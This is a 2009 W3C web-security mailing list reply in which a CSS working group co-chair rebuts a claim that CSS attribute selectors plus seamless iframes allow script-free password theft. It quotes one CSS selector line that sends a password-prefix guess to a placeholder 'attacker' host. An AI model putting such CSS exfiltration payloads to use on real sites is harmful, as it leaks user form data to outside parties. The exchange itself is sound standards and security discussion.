W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Daniel Glazman <daniel@glazman.org>
Date: Mon, 07 Dec 2009 21:26:25 +0100
Message-ID: <4B1D64F1.3040407@glazman.org>
To: public-web-security@w3.org
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
> create a new type of XSS attacks, and those are purely CSS based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary files
> from the page WITHOUT the need of JS.

Not at all. I repeat: not at all.

You are making a confusion here between the value _HTML attribute_ and
the value _DOM attribute_. The former represents the default value of
the input element, and that's VERY unlikely a web author will ever want
to give a default value to a password field; the latter represents the
current value of the field and it's NOT, I repeat NOT, copied to the
HTML attribute.

So your selector above will never react to a character typed into a
password field. It only reacts to the default value of the field...

W3C CSS WG, Co-Chair
Received on Monday, 7 December 2009 20:26:57 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 18:09:23 UTC